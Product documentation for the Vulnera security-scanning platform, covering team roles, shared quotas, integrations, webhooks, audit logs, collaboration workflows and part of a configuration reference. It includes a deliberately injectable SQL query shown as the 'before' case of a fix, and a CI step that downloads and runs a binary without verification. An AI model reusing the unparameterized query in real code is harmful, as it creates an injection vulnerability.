    • Best for: 1-2 key decision-makers per organization
    • Caution: Rarely needed, keep minimal
  • Admin — Team leads, security directors, technical leads

    • Best for: Day-to-day organization management
    • Responsibility: Member provisioning, integration setup
  • Member — Developers, security engineers, DevOps engineers

    • Best for: Active security practitioners who scan code
    • Permissions: Run scans, view/resolve findings
  • Viewer — Executives, managers, stakeholders (read-only)

    • Best for: Non-technical decision-makers who need visibility
    • Permissions: View scans, findings, reports (no modifications)

Managing Team Members

Inviting Members

Method 1: Dashboard Invitation

  1. Go to Settings → Members
  2. Click Invite Member
  3. Enter email address(es) — comma-separated for bulk invite
  4. Select role for each member:
    • Admin (for team leads)
    • Member (for developers)
    • Viewer (for stakeholders)
  5. Click Send Invitations
  6. Members receive email with join link (valid for 7 days)

Method 2: Share Organization Link

  1. Go to Settings → Members → Copy Share Link
  2. Share link with team (anyone with link can request access)
  3. Requests appear in pending approval queue
  4. Admin reviews and approves/denies

Accepting an Invitation

Members receive email from invite@vulnera.studio:

  1. Click Join Organization link
  2. Sign in to Vulnera account (create if needed)
  3. Click Accept Invitation
  4. Redirect to organization dashboard
  5. Immediately have access to shared quota and scans

Member Status States

Status | Description | Action
--- | --- | ---
Invited | Email sent, awaiting acceptance | Can resend invite or cancel
Active | Member joined and has access | Can change role or remove
Pending Approval | Join request submitted (if approval required) | Admin can approve/deny
Inactive | Member inactive >30 days | Can reactivate or remove
Removed | Former member, no access | Can reinvite

Changing Member Roles

  1. Go to Settings → Members
  2. Find member in list
  3. Click member row → Edit
  4. Change role dropdown
  5. Click Save — changes take effect immediately
  6. Member receives notification of role change

Removing Members

  1. Go to Settings → Members
  2. Click member → Remove
  3. Confirm removal
  4. Member loses all access immediately
  5. Their scans remain in history (read-only for audit purposes)

Note: Removed members can be reinvited later.

Viewing Member Activity

Member Details Page:

  1. Go to Settings → Members
  2. Click member name
  3. View:
    • Email address, role, join date
    • Last active timestamp
    • Scans created by member
    • API keys generated by member
    • Activity timeline

Organization Audit Log (Admin only):

  1. Go to Settings → Audit Log
  2. Filter by member:
    • Action type (invited, removed, scan created, etc.)
    • Member email
    • Date range
  3. Export as CSV for compliance

Shared Quota Management

Understanding Organization Quotas

When members scan within an organization, tokens are consumed from the shared organization quota, not individual quotas.

Example:

  • Organization quota: 1000 tokens/month (Pro plan)
  • Member A creates scan: uses 10 tokens from shared pool
  • Member B creates scan: uses 15 tokens from shared pool
  • Remaining: 975 tokens available to all members
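The shared-pool arithmetic above is straightforward to verify:

```python
quota = 1000          # Pro plan monthly tokens
scans = [10, 15]      # tokens consumed by Member A and Member B
remaining = quota - sum(scans)
print(remaining)  # 975
```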

Quota Allocation Strategies

Strategy 1: Fully Shared (Default)

  • All members share single quota pool
  • Transparent: Anyone can see total usage
  • Best for: Small, collaborative teams

Strategy 2: Department Quotas (Enterprise)

  • Divide quota by team (e.g., 400 tokens/Backend team, 300/Frontend)
  • Managed via API or contact sales
  • Best for: Large organizations with multiple teams

Strategy 3: Per-Member Budgets (Enterprise)

  • Set individual limits per member (e.g., 50 tokens/developer)
  • Prevents single member from exhausting quota
  • Best for: Organizations with varied usage patterns

Monitoring Quota Usage

Organization Dashboard:

  1. Go to Organization → Analytics → Dashboard
  2. View:
    • Total tokens used this month
    • Tokens remaining
    • Usage trend graph (last 6 months)
    • Per-member breakdown table

Usage Breakdown:

Total: 850 / 1000 tokens used (85%)

By Module:
├── Dependency Analysis: 450 tokens (53%)
├── SAST: 300 tokens (35%)
├── Secrets: 75 tokens (9%)
└── API Security: 25 tokens (3%)

By Member:
├── alice@acme.com: 400 tokens (47%)
├── bob@acme.com: 300 tokens (35%)
└── charlie@acme.com: 150 tokens (18%)

Setting Quota Alerts

Configure notifications when quota usage reaches thresholds:

  1. Go to Settings → Notifications → Quota Alerts
  2. Enable alerts at:
    • 50% usage
    • 75% usage
    • 90% usage
    • 100% (exhausted)
  3. Choose notification method:
    • Email (sent to organization contact)
    • Slack (if integrated)
    • In-app notification
  4. Save

Upgrading Quota

Option 1: Upgrade Plan

  • Free → Pro: +952 tokens (1000 total)
  • Pro → Enterprise: Custom allocation
  • Go to Settings → Billing → Upgrade Plan

Option 2: Temporary Quota Boost (Enterprise)

  • Purchase additional tokens mid-month
  • Contact sales@vulnera.studio
  • Valid for 30 days; unused boost tokens expire at the end of that window

Organization Settings

General Settings

Organization Profile:

  • Organization name
  • Description
  • Logo (upload new or remove)
  • Contact email
  • Website URL (optional)

Edit: Settings → General → Edit Profile

Security Settings

Two-Factor Authentication (for members):

  • Require 2FA for all members (optional, Admin sets)
  • Go to Settings → Security → Require 2FA

Session Management:

  • Session timeout: 30 minutes (default)
  • Custom timeout available (Enterprise)
  • Go to Settings → Security → Session Policy

IP Whitelisting (Enterprise):

  • Restrict access to specific IP ranges
  • Useful for VPN-only access
  • Go to Settings → Security → IP Whitelist

SSO/SAML (Enterprise):

  • Single sign-on via Okta, Azure AD, Google Workspace
  • Auto-provisioning of team members
  • Go to Settings → Security → SSO Configuration

Data & Privacy

Data Retention Policy:

  • Set how long scan results are kept (30 days to 2 years)
  • Default: 1 year
  • Go to Settings → Data → Retention Policy

Data Export:

  • Export all organization data (GDPR compliance)
  • Includes scans, findings, member list, audit logs
  • Go to Settings → Data → Export Organization Data

Data Deletion:

  • Permanently delete organization and all data (irreversible)
  • Requires Owner password confirmation
  • Go to Settings → Data → Delete Organization

Billing & Subscriptions

View Subscription:

  1. Go to Settings → Billing → Subscription
  2. View:
    • Current plan (Free/Pro/Enterprise)
    • Billing cycle (monthly/annual)
    • Next billing date
    • Annual savings (if on annual plan)

Update Payment Method:

  1. Go to Settings → Billing → Payment Method
  2. Click Edit
  3. Update card details or select different card
  4. Click Save

Invoices & History:

  1. Go to Settings → Billing → Invoices
  2. View all past invoices (searchable)
  3. Download as PDF
  4. Filter by date range

Upgrade/Downgrade Plan:

  1. Go to Settings → Billing → Change Plan
  2. Select new plan
  3. Review pricing impact
  4. Click Confirm Upgrade/Downgrade
  5. Changes take effect immediately (or at next cycle)

Integrations & Webhooks

Slack Integration

Setup:

  1. Go to Settings → Integrations → Slack
  2. Click Connect Slack Workspace
  3. Select your Slack workspace and authorize
  4. Select notification channel
  5. Enable notification types:
    • Critical findings
    • Daily summary
    • Weekly report
    • Quota alerts

Slack Notifications Example:

🚨 Critical Vulnerability Detected
Repository: acme/backend
Finding: SQL Injection in POST /api/users
Severity: Critical (CVSS 9.2)
Module: SAST
👉 View Details

Disable Slack:

  • Go to Settings → Integrations → Slack
  • Click Disconnect

GitHub Integration

Setup:

  1. Go to Settings → Integrations → GitHub
  2. Click Connect GitHub
  3. Authorize Vulnera GitHub App
  4. Select repositories to scan
  5. Configure auto-scan triggers:
    • On push to main/develop
    • On all pull requests
    • Scheduled daily

GitHub Features:

  • PR comments with findings
  • Status checks (block merge if critical)
  • SARIF upload to code scanning
  • Auto-create issues for high-severity findings

Manage Repositories:

  • Add new repos: Settings → Integrations → GitHub → Add Repository
  • Remove repos: Settings → Integrations → GitHub → Remove (⋯)

GitLab Integration

Setup (via CI/CD):

In .gitlab-ci.yml:

vulnera-scan:
  image: vulnera:latest
  script:
    - vulnera auth login --api-key $VULNERA_API_KEY
    - vulnera analyze . --all-modules --format sarif > vulnera.sarif
  artifacts:
    reports:
      sast: vulnera.sarif
    paths:
      - vulnera.sarif
  allow_failure: true

Webhooks

Create Webhook:

  1. Go to Settings → Webhooks → Add Webhook
  2. Enter webhook URL (must be HTTPS)
  3. Select events:
    • scan.started — Analysis job started
    • scan.completed — Analysis finished
    • finding.created — New vulnerability detected
    • finding.resolved — Manually marked resolved
  4. (Optional) Set webhook secret for signature verification
  5. Click Create

Test Webhook:

  1. Go to Settings → Webhooks
  2. Find webhook in list
  3. Click Test → sends sample payload to URL
  4. View response status and body

Webhook Payload:

{
  "event": "scan.completed",
  "scan_id": "scan-abc123def456",
  "organization_id": "org-xyz789",
  "project": {
    "name": "acme/backend",
    "source": "github",
    "url": "https://github.com/acme/backend"
  },
  "analysis_results": {
    "total_findings": 12,
    "critical": 2,
    "high": 5,
    "medium": 4,
    "low": 1
  },
  "modules_run": [
    "dependencies",
    "sast",
    "secrets"
  ],
  "timestamp": "2024-01-15T14:30:00Z",
  "duration_seconds": 245
}

Webhook Security:

  • Always use HTTPS
  • Verify webhook signature on your server
  • Signature header: X-Vulnera-Signature: sha256=<hash>
  • Implement timeout/retry logic
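The signature check can be sketched in Python. The exact signing scheme (HMAC-SHA256 over the raw request body, hex-encoded after the `sha256=` prefix) is an assumption based on common webhook conventions such as GitHub's — confirm it against your webhook settings:

```python
import hashlib
import hmac

def verify_vulnera_signature(secret: str, body: bytes, signature_header: str) -> bool:
    """Verify an X-Vulnera-Signature header against the raw request body.

    Assumes the header format 'sha256=<hex HMAC-SHA256 of body>' (a common
    convention; not confirmed by this guide). Always compute the digest over
    the raw bytes you received, before any JSON parsing.
    """
    if not signature_header.startswith("sha256="):
        return False
    expected = hmac.new(secret.encode(), body, hashlib.sha256).hexdigest()
    # Constant-time comparison avoids leaking timing information
    return hmac.compare_digest(signature_header[len("sha256="):], expected)
```

Reject the request (HTTP 401) whenever this returns False, and only then parse the payload.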

Audit & Compliance

Audit Log

Organization admins can view all member actions and configuration changes.

Access Audit Log:

  1. Go to Settings → Audit Log
  2. View entries (newest first):
    • Timestamp
    • Member email
    • Action (invited, scan created, key generated, etc.)
    • Resource affected
    • IP address

Filter Audit Log:

  • By action type (Member activity, Configuration, Scan, Integration)
  • By member email
  • By date range
  • By resource (scan ID, API key ID, etc.)

Export Audit Log:

  1. Go to Settings → Audit Log → Export
  2. Select date range
  3. Choose format: CSV or JSON
  4. Download file

Audit Log Retention:

  • Free plan: 30 days
  • Pro: 90 days
  • Enterprise: 2 years (configurable)

Compliance Reports

Generate Compliance Report:

  1. Go to Reports → Compliance Reports
  2. Select framework:
    • SOC2 Type II
    • ISO 27001
    • GDPR
    • HIPAA (Enterprise)
    • PCI DSS (Enterprise)
  3. Select date range
  4. Click Generate
  5. Download as PDF

Report Contents:

  • Organization access controls summary
  • Member provisioning/deprovisioning records
  • Security incident history
  • Data handling practices
  • Audit log excerpts

Best Practices

Organization Structure

Small Teams (1-10 members):

  • 1 Owner
  • 1-2 Admins
  • Rest as Members/Viewers
  • Shared quota sufficient

Medium Teams (10-50 members):

  • 1 Owner
  • 3-5 Admins (by department/team)
  • Members/Viewers as needed
  • Consider department quotas (Enterprise)

Large Organizations (50+ members):

  • 1 Owner
  • 10+ Admins (by team/geography)
  • Hierarchical teams (Enterprise)
  • Custom RBAC roles (Enterprise)
  • SSO/SAML mandatory

Member Lifecycle

Onboarding:

  1. Invite new member with appropriate role
  2. Have member review organization settings
  3. Add to Slack channel notifications
  4. Provide API key for CLI (if Member/Admin)
  5. Confirm first scan works

Offboarding:

  1. Remove member from organization
  2. Revoke API keys (if any)
  3. Review scans they created (for audit)
  4. Export member’s contributions (if needed)
  5. Archive related configurations

Security Practices

Do:

  • Assign minimal required role (principle of least privilege)
  • Use Viewers for non-technical stakeholders
  • Rotate API keys every 90 days
  • Enable 2FA for all members (if available)
  • Audit member list quarterly
  • Review audit logs monthly
  • Enable webhook signature verification

Don’t:

  • Share API keys between members
  • Grant Owner role to multiple people
  • Use generic/shared email addresses
  • Disable audit logging
  • Leave unused integrations connected
  • Ignore quota warnings

Troubleshooting

Q: Member invited but never received email

A: 1. Check their spam folder
   2. Resend invite: Settings → Members → Resend
   3. Verify email address spelling
   4. Check if email is already registered (member may self-join)

Q: Member can’t see organization scans

A: 1. Verify member role is not Viewer
   2. Confirm member accepted invitation
   3. Member should log out and log back in
   4. Clear browser cache
   5. Check audit log for removal records

Q: API key not working for organization scans

A: 1. Verify key belongs to org admin/member
   2. Check key hasn't expired (Settings → API Keys)
   3. Confirm key has org scope (not just personal)
   4. Regenerate if needed
   5. Verify member role allows scan creation

Q: Quota exhausted early

A: 1. Review usage (Analytics → Dashboard)
   2. Check for duplicate scans
   3. Optimize scan targets (exclude node_modules, etc.)
   4. Upgrade plan (Settings → Billing)
   5. Contact sales for temporary boost (Enterprise)

Q: How to transfer organization ownership

A: 1. Owner adds desired new owner as Admin
   2. New owner transfers via Settings → Transfer Ownership
   3. Current owner confirms transfer
   4. Former owner demoted to Admin automatically

Next Steps

  • Set Up Integrations — Connect Slack, GitHub for automated workflows
  • Configure Webhooks — Feed findings to your ticketing system
  • Generate Your First Report — Create compliance or executive summary report
  • Audit Organization — Review member list and access quarterly

For team collaboration workflows, see Team Collaboration Guide. For dashboard features, see Dashboard Guide.


Need help? Email support@vulnera.studio or visit our FAQ.

Team Collaboration Guide

Vulnera enables seamless collaboration across security teams, DevOps, and developers. This guide covers workflows for shared vulnerability analysis, coordinated remediation, and team-based security practices.

Collaboration Workflows

Shared Analysis Setup

Scenario: Security team wants developers to run scans and review findings together

  1. Create Organization

    • Go to Dashboard → + New Organization
    • Name: “Engineering Security”
    • Add organization description
  2. Invite Team Members

    • Go to Settings → Members → Invite Member
    • Invite developers with Member role (can create scans, resolve findings)
    • Invite security lead with Admin role (manage integrations, settings)
    • Invite executives with Viewer role (read-only access to reports)
  3. Set Up Shared Quota

    • Organization gets shared token pool (e.g., 1000 tokens/month for Pro)
    • All members draw from same pool
    • No individual limits unless configured (Enterprise)
  4. Enable Notifications

    • Settings → Integrations → Slack
    • Connect team Slack workspace
    • Enable daily summary and critical finding alerts
    • All members get notifications in shared channel

Scan Coordination

Multi-stage scanning workflow:

Developer creates scan
         ↓
Scan runs (uses shared quota)
         ↓
Results available to all members
         ↓
Security team reviews findings
         ↓
Developer addresses findings
         ↓
Findings marked resolved
         ↓
Historical record kept for audit

Practical Example:

  1. Developer Alice runs scan on /backend:

    vulnera auth login --api-key $ORG_API_KEY  # (org key, not personal)
    vulnera analyze ./backend --all-modules
    
  2. Security lead Bob reviews findings in dashboard:

    • Open scan → Filter by Critical/High severity
    • Add comments to findings
    • Mark false positives
    • Create Jira tickets for issues
  3. Developer Alice gets Slack notification:

    • “New critical finding in backend scan”
    • She clicks link → opens dashboard
    • Sees Bob’s comments and tickets
    • Fixes code locally
  4. Alice re-runs scan after fix:

    • Same findings now show as “Resolved”
    • Historical comparison shows before/after

Code Review Integration

GitHub PR workflow with Vulnera:

  1. Setup GitHub Integration (Admin):

    • Settings → Integrations → GitHub
    • Authorize Vulnera app
    • Enable “Auto-scan PRs”
  2. Developer opens PR:

    • GitHub automatically triggers Vulnera scan
    • Results appear as PR status check
  3. Security review:

    • PR blocked if critical issues found
    • Vulnera comment on PR with findings
    • Link to full dashboard for details
    • Developer can request security review
  4. Resolution:

    • Developer pushes fix commit
    • Vulnera automatically re-scans
    • If clean, PR check passes
    • Can now merge to main

Example GitHub PR Comment:

🚨 Vulnera Security Scan Found Issues

Critical (1):
- SQL Injection in /src/api/users.py:45
  CVSS: 9.2

High (2):
- Hardcoded API key in config.py:12
- Missing input validation in POST /api/data:78

View full report: [Dashboard Link]
Bot action: This PR is blocked until issues are resolved

Finding Management

Assigning Findings

Assign to Team Member:

  1. Open scan → select finding
  2. Click Assign To
  3. Search member by email or name
  4. Member gets notification:
    • Email: “You’ve been assigned a critical finding”
    • Slack: Link to finding with severity
    • In-app: Shows in “Assigned to Me” queue

My Assignments View:

  • Dashboard → My Assignments
  • Shows all findings assigned to current member
  • Sort by severity, due date, project
  • Quick filter: Unstarted, In Progress, Blocked

Tracking Remediation

Finding Status Lifecycle:

Open (New)
    ↓
In Progress (assigned, work started)
    ↓
Resolved (fix implemented, verified)
OR
False Positive (not a real issue)
OR
Acknowledged (known issue, accepting risk)

Updating Status:

  1. Open finding → Status dropdown

  2. Select new status

  3. Add comment (optional):

    • Explain why marked false positive
    • Link to fix PR or commit
    • Document risk acceptance
  4. Members with access see update:

    • Slack notification: “@alice marked as Resolved”
    • Audit log records change
    • Dashboard updates in real-time

Commenting & Discussion

Collaborate on Finding:

  1. Open finding → scroll to Discussion section
  2. Click Add Comment
  3. Type message (Markdown supported)
  4. @mention team members: @bob or @security-team
  5. Submit → all mentioned members notified

Example Finding Discussion:

Alice: "This is a security issue in our OAuth implementation"

Bob: "Good catch. I'll check if this affects production"

Charlie: "@bob let's verify in staging first"

Security Lead: "Approved for resolution. PR: #4521"

Threaded Discussions (Enterprise):

  • Reply to specific comments
  • Resolve/pin important threads
  • Export discussion for compliance

Reporting & Analytics

Team Analytics Dashboard

Organization Analytics (Admin view):

Go to Settings → Analytics → Dashboard

View:

  • Team quota usage (bar chart: 850/1000 tokens used)
  • Usage by member (table: Alice 400 tokens, Bob 300, etc.)
  • Usage by module (pie: Dependencies 50%, SAST 35%, Secrets 15%)
  • Trend (line graph: last 6 months)
  • Busiest project, most findings by type

Shared Reports

Generate Report for Stakeholders:

  1. Go to Reports → New Report
  2. Select report type:
    • Executive Summary — High-level metrics for leadership
    • Detailed Technical — Full findings for security team
    • Compliance — SOC2/ISO27001/GDPR aligned
    • Department Summary — Findings by team/project
  3. Configure:
    • Date range (last 30 days, last quarter, custom)
    • Modules to include (dependencies, SAST, secrets, API)
    • Recipients (email, download, or both)
  4. Click Generate
  5. Share PDF/HTML with stakeholders

Executive Summary Example:

VULNERA SECURITY REPORT
January 2024

OVERVIEW
Total Vulnerabilities: 247
Critical: 12  |  High: 45  |  Medium: 120  |  Low: 70

TRENDS
↓ 15% fewer critical issues vs. last month
→ Secrets detection improved (5 leaked credentials caught)
↑ Dependencies increased (new packages added)

TEAM PERFORMANCE
Alice: 42 scans, 340 findings reviewed
Bob: 38 scans, 280 findings reviewed
Charlie: 25 scans, 180 findings reviewed

NEXT STEPS
1. Remediate 5 critical issues (ongoing)
2. Update 12 outdated dependencies (in progress)
3. Add 2 new team members for code review capacity

Custom Dashboards (Enterprise)

Create personalized views:

  1. Go to Organization → Dashboards → Custom
  2. Select widgets:
    • Recent findings
    • Team quota gauge
    • Trend chart
    • Member activity
    • CI/CD integration status
  3. Arrange layout, save as team dashboard
  4. Share with team members

Security Team Workflows

Daily Security Review Routine

Morning (15 min):

  1. Check Slack for critical findings overnight
  2. Review My Assignments dashboard
  3. Prioritize by severity and project criticality

Mid-day (30 min):

  1. Comment on findings with remediation guidance
  2. Assign new findings to developers
  3. Update status on resolved items

End-of-day (10 min):

  1. Generate daily summary report
  2. Check team quota usage (alert if >75%)
  3. Review newly integrated repositories

Weekly (1 hour):

  1. All-hands meeting: review weekly findings summary
  2. Discuss high-priority remediation blockers
  3. Plan integrations/automation improvements

Escalation Process

When to escalate finding:

  1. Critical + No Owner Assigned → Assign to team lead immediately
  2. Finding unresolved 7+ days → Escalate to manager
  3. Multiple critical findings in same code → Schedule code review session
  4. Suspicious pattern (e.g., many secrets) → Notify CISO

Escalation in Dashboard:

  1. Open finding → Mark Escalated
  2. Add reason:
    • High business impact
    • Unresponsive team
    • Need architecture review
  3. Escalated findings show in red on analytics
  4. Leadership dashboard shows escalations count

Developer Workflows

Running Scans as Developer

Individual Contributor:

# Authenticate with org API key
vulnera auth login --api-key $ORG_API_KEY

# Scan your code (uses org quota, not personal)
vulnera analyze ./src --all-modules --format json

# View results (or use dashboard)
vulnera analyze ./src --all-modules --format json | jq '.findings[] | {location, message, severity}'

Pre-commit Scanning:

  1. Install hook:

    vulnera install-hook ./
    
  2. Hook runs before commit, blocks if critical:

    $ git commit
    Vulnera scan in progress...
    2 critical findings detected. Commit blocked.
    Fix and retry: git commit
    

CI/CD Integration:

In .github/workflows/security.yml:

name: Security Scan

on: [push, pull_request]

jobs:
  vulnera-scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3

      - name: Run Vulnera scan
        env:
          VULNERA_API_KEY: ${{ secrets.VULNERA_API_KEY }}
        run: |
          curl -L https://releases.vulnera.studio/vulnera-linux-x86_64 -o vulnera
          chmod +x vulnera
          ./vulnera analyze . --all-modules --format sarif > vulnera.sarif

      - name: Upload SARIF to GitHub
        uses: github/codeql-action/upload-sarif@v2
        with:
          sarif_file: vulnera.sarif

Understanding & Fixing Findings

When you get assigned a finding:

  1. Notification (Slack, email, dashboard)

    • Click link → opens finding details
  2. Understand the Issue

    • Read vulnerability explanation
    • Look at affected code snippet
    • Review CVSS score and severity
    • Check provided remediation guidance
  3. Research if Needed

    • Follow linked CVE/CWE
    • Check if it affects your use case
    • Ask security team for context (@bob in dashboard)
  4. Fix or Dismiss

    • If real issue: Create fix branch, implement patch, commit
    • If false positive: Mark as such in dashboard with reason
    • If acceptable risk: Mark as “Acknowledged” (with manager approval)
  5. Verify

    • Re-run scan locally: vulnera analyze ./
    • Finding should disappear or show as resolved
    • Create PR with fix
    • Vulnera auto-scans PR → shows as clean
  6. Mark Complete

    • PR merged → Vulnera marks finding resolved
    • Or manually: Dashboard → Finding → Status → Resolved

Example Finding Workflow:

Finding: SQL Injection in /api/users.py:45
Severity: Critical
CVSS: 9.2

Developer reads:
"User input is concatenated directly into SQL query without parameterization"

Developer fixes:
# Before
query = f"SELECT * FROM users WHERE id = {user_id}"

# After
query = "SELECT * FROM users WHERE id = $1"
db.execute(query, [user_id])

Developer re-scans → Finding gone → PR merged

Dashboard shows: “Resolved by commit abc123def”


Cross-Team Collaboration

Developer + Security Team

Weekly Sync Meeting:

  1. Agenda (30 min):

    • Review critical findings from past week
    • Discuss blockers (unclear requirements, false positives)
    • Prioritize next week’s work
    • Demo fixes and improvements
  2. Before Meeting:

    • Security team prepares findings summary (generated report)
    • Developers review assigned items in dashboard
    • Both teams note questions
  3. After Meeting:

    • Document decisions in dashboard comments
    • Update remediation timeline
    • Send summary email to stakeholders

DevOps + Security Team

Infrastructure Scanning:

  1. DevOps sets up cloud scanning:

    vulnera analyze s3://our-bucket --all-modules
    vulnera analyze github-repos --org acme-corp --all-modules
  2. Security reviews infrastructure findings:

    • Cloud misconfigurations
    • Exposed credentials in configs
    • Vulnerable dependencies in infra code
  3. DevOps fixes issues:

    • Updates IaC templates (Terraform, CloudFormation)
    • Re-scans to verify
    • Dashboards show infrastructure security posture

Security Team + Leadership

Monthly Executive Report:

  1. Generate Compliance Report:

    • Go to Reports → Compliance Reports → SOC2
    • Select past month
    • Download PDF
  2. Include in Board Deck:

    • Overview of findings trend
    • Team remediation velocity
    • Risk metrics and KPIs
    • Budget/quota efficiency
  3. Dashboard Access for Leadership:

    • Create Viewer accounts for executives
    • Give read-only access to reports
    • They can view trends without modifying findings

Notifications & Alerts

Configuring Team Notifications

Central Configuration (Admin):

  1. Go to Settings → Notifications
  2. Set for entire team:
    • Critical findings: Immediate Slack alert
    • High findings: Daily digest email
    • Quota alerts: At 75%, 90%, 100%
    • Member activity: Weekly summary

Personal Preferences (Member):

  1. Go to Profile → Notification Preferences
  2. Member can override:
    • Frequency (real-time, daily digest, weekly summary)
    • Channel (email, Slack, in-app, SMS)
    • Finding types (all, critical only, assigned only)

Slack Channel Strategy

Setup Channels:

  • #vulnera-critical — Real-time critical findings (mention team lead)
  • #vulnera-security — All findings, daily summary (team discussion)
  • #vulnera-alerts — Quota warnings, integration issues (ops only)
  • #vulnera-ci — PR scan results, CI/CD integration logs (read-only bot)

Slack Automation Example:

@vulnera-bot configure
├── #vulnera-critical: severity >= critical
├── #vulnera-security: summary daily 9 AM
├── #vulnera-alerts: quota > 90%
└── #vulnera-ci: all GitHub PR scans

Performance Metrics

Key Metrics to Track

Team Health:

  • Remediation Rate — % of findings fixed within SLA
  • Mean Time to Remediation (MTTR) — Days from finding to resolved
  • False Positive Rate — % of dismissed as not real issue
  • Scan Frequency — Scans per week by team

Security Posture:

  • Critical Findings Trend — Month-over-month comparison
  • Dependency Age — Average age of dependencies
  • Secret Exposures — Count of exposed credentials (should be zero)
  • Coverage — % of repositories being scanned

Quota Efficiency:

  • Tokens/Finding — Cost per vulnerability found
  • Scans/Token — How many scans per token used
  • Team Quota Burndown — Days until month-end quota exhausted
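As a rough sketch, the first two team-health metrics above could be computed from an exported findings list. The `created_at`/`resolved_at` field names are hypothetical illustrations, not Vulnera's actual export schema:

```python
from datetime import datetime

def team_health(findings: list[dict], sla_days: int = 7) -> dict:
    """Compute remediation rate and MTTR from a findings export.

    Each finding is assumed to carry an ISO-8601 'created_at' timestamp and,
    once fixed, a 'resolved_at' timestamp (hypothetical field names).
    """
    resolved = [f for f in findings if f.get("resolved_at")]
    days_to_fix = [
        (datetime.fromisoformat(f["resolved_at"]) - datetime.fromisoformat(f["created_at"])).days
        for f in resolved
    ]
    within_sla = sum(1 for d in days_to_fix if d <= sla_days)
    return {
        # Share of all findings fixed within the SLA window
        "remediation_rate": within_sla / len(findings) if findings else 0.0,
        # Mean days from detection to resolution, over resolved findings only
        "mttr_days": sum(days_to_fix) / len(days_to_fix) if days_to_fix else None,
    }
```

Feed it the JSON export from Settings → Analytics → Export (after adapting the field names) to fill in the monthly review template below.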

Monthly Review Template

Run this monthly:

  1. Export analytics report (Settings → Analytics → Export)
  2. Calculate metrics above
  3. Create 1-page summary:
    • Headline: metrics vs. last month
    • Key wins: critical issues resolved
    • Blockers: findings taking too long
    • Next month priorities
  4. Share with team + leadership

Best Practices

Team Organization

Small Team (5 members):

  • 1 Security lead (Admin)
  • 4 Developers (Members)
  • Shared single quota pool
  • Daily Slack updates

Medium Team (15 members):

  • 1-2 Security leads (Admin)
  • 10-12 Developers (Member)
  • 2-3 Managers (Viewer)
  • Department-specific Slack channels

Large Organization (50+ members):

  • Hierarchical teams (Enterprise)
  • Custom RBAC roles
  • Department quotas
  • Cross-team steering committee

Communication Best Practices

Do:

  • Comment on findings with context (not just “fix this”)
  • Mention developers in Slack for urgent issues
  • Have weekly syncs (async updates via dashboard)
  • Document decisions in finding comments
  • Celebrate resolved critical findings

Don’t:

  • Assign findings without explanation
  • Ignore escalated issues
  • Let findings sit unreviewed >5 days
  • Resolve without verification
  • Skip audit log reviews

Security Practices

Do:

  • Use organization API keys, not personal keys
  • Rotate API keys quarterly
  • Enable 2FA for all members
  • Audit member list monthly
  • Export compliance reports quarterly
  • Review webhook logs

Don’t:

  • Share API keys in chat/email
  • Use shared email addresses
  • Keep inactive members in org
  • Disable audit logging
  • Store findings in plaintext
  • Ignore unreviewed scans

Common Scenarios

Scenario 1: Onboarding New Developer

  1. Admin invites developer with Member role
  2. Developer accepts invite
  3. DevOps provides org API key
  4. Developer authenticates: vulnera auth login --api-key
  5. Developer runs first scan: vulnera analyze ./
  6. Security team reviews findings, comments with guidance
  7. Developer receives Slack notification, fixes issues
  8. Next scan shows issues resolved

Timeline: 30 minutes total

Scenario 2: Critical Finding in Production Code

  1. Vulnera detects critical SQL injection in production branch
  2. Slack alert goes to #vulnera-critical (pings team lead)
  3. Security lead opens dashboard, verifies severity
  4. Security lead assigns to Alice (code owner) with comment: “URGENT: Fix before merge”
  5. Alice gets Slack notification, sees 9.2 CVSS score
  6. Alice creates hotfix branch, implements parameterized query
  7. Alice commits fix, GitHub auto-scans PR (Vulnera)
  8. Dashboard shows finding now marked “Resolved”
  9. Alice creates PR, security approves, code merged
  10. Production release includes fix

Timeline: 2-4 hours

Scenario 3: Monthly Compliance Reporting

  1. Security lead runs report: Reports → Compliance → SOC2 → January
  2. Report generated: PDF with audit log, member actions, findings summary
  3. Security lead emails report to CISO, board
  4. CISO reviews with dashboard (Viewer access)
  5. Sends to auditor for compliance verification

Timeline: 10 minutes to generate, 1 hour to review

Troubleshooting

Q: Team member not seeing organization scans

A: 1. Verify member accepted invitation (check email)
   2. Confirm member role is not Viewer
   3. Have member log out/log back in
   4. Clear browser cache
   5. Check if member was removed (Settings → Audit Log)

Q: Findings not appearing in Slack

A: 1. Verify Slack integration enabled (Settings → Integrations)
   2. Check notification triggers configured
   3. Verify Vulnera app still has channel permissions
   4. Test webhook: Settings → Webhooks → Test
   5. Check Slack app hasn't been uninstalled from workspace

Q: Team member assigned findings but didn’t respond

A: 1. Verify notification settings (Settings → Notifications)
   2. Member may have disabled email notifications
   3. Send direct Slack message if urgent
   4. Escalate to manager if blocking
   5. Consider reassigning if no response in 3 days

Q: How to handle team member leaving?

A: 1. Remove member (Settings → Members → Remove)
   2. Revoke their API keys immediately
   3. Reassign their open findings to other members
   4. Export their scan history (for audit/compliance)
   5. Review audit log for any suspicious activity

Next Steps

  • Set Up Slack — Enable real-time alerts for your team
  • Create Weekly Sync — Calendar recurring meeting to review findings
  • Generate First Report — Monthly compliance or executive summary
  • Document Workflows — Create team runbook for common scenarios

For dashboard features, see Dashboard Guide. For organization setup, see Organization Management.


Need help? Email support@vulnera.studio or visit our FAQ.

Configuration Reference

This page documents all configuration options for Vulnera.

Environment Variables

All configuration can be set via environment variables with the VULNERA__ prefix using double underscores for nesting.


Core Settings

  • DATABASE_URL — PostgreSQL connection string (Required)
  • VULNERA__AUTH__JWT_SECRET — JWT signing secret, 32+ chars (Required)
  • VULNERA__SERVER__ADDRESS — Server bind address (default: 0.0.0.0:3000)
  • VULNERA__SERVER__ENABLE_DOCS — Enable Swagger UI (default: true)

LLM Configuration

Vulnera supports multiple LLM providers for AI-powered features.

Provider Selection

  • VULNERA__LLM__PROVIDER — Active provider: google_ai, openai, azure (default: google_ai)
  • VULNERA__LLM__DEFAULT_MODEL — Model name for generation (default: gemini-2.0-flash)
  • VULNERA__LLM__TEMPERATURE — Generation temperature, 0.0-1.0 (default: 0.3)
  • VULNERA__LLM__MAX_TOKENS — Maximum tokens to generate (default: 2048)
  • VULNERA__LLM__TIMEOUT_SECONDS — Request timeout in seconds (default: 60)
  • VULNERA__LLM__ENABLE_STREAMING — Enable streaming responses (default: true)

Google AI (Gemini)

  • GOOGLE_AI_KEY — API key from aistudio.google.com
  • VULNERA__LLM__GOOGLE_AI__BASE_URL — Custom API endpoint

Recommended models: gemini-2.0-flash, gemini-1.5-pro

OpenAI

  • OPENAI_API_KEY — API key from platform.openai.com
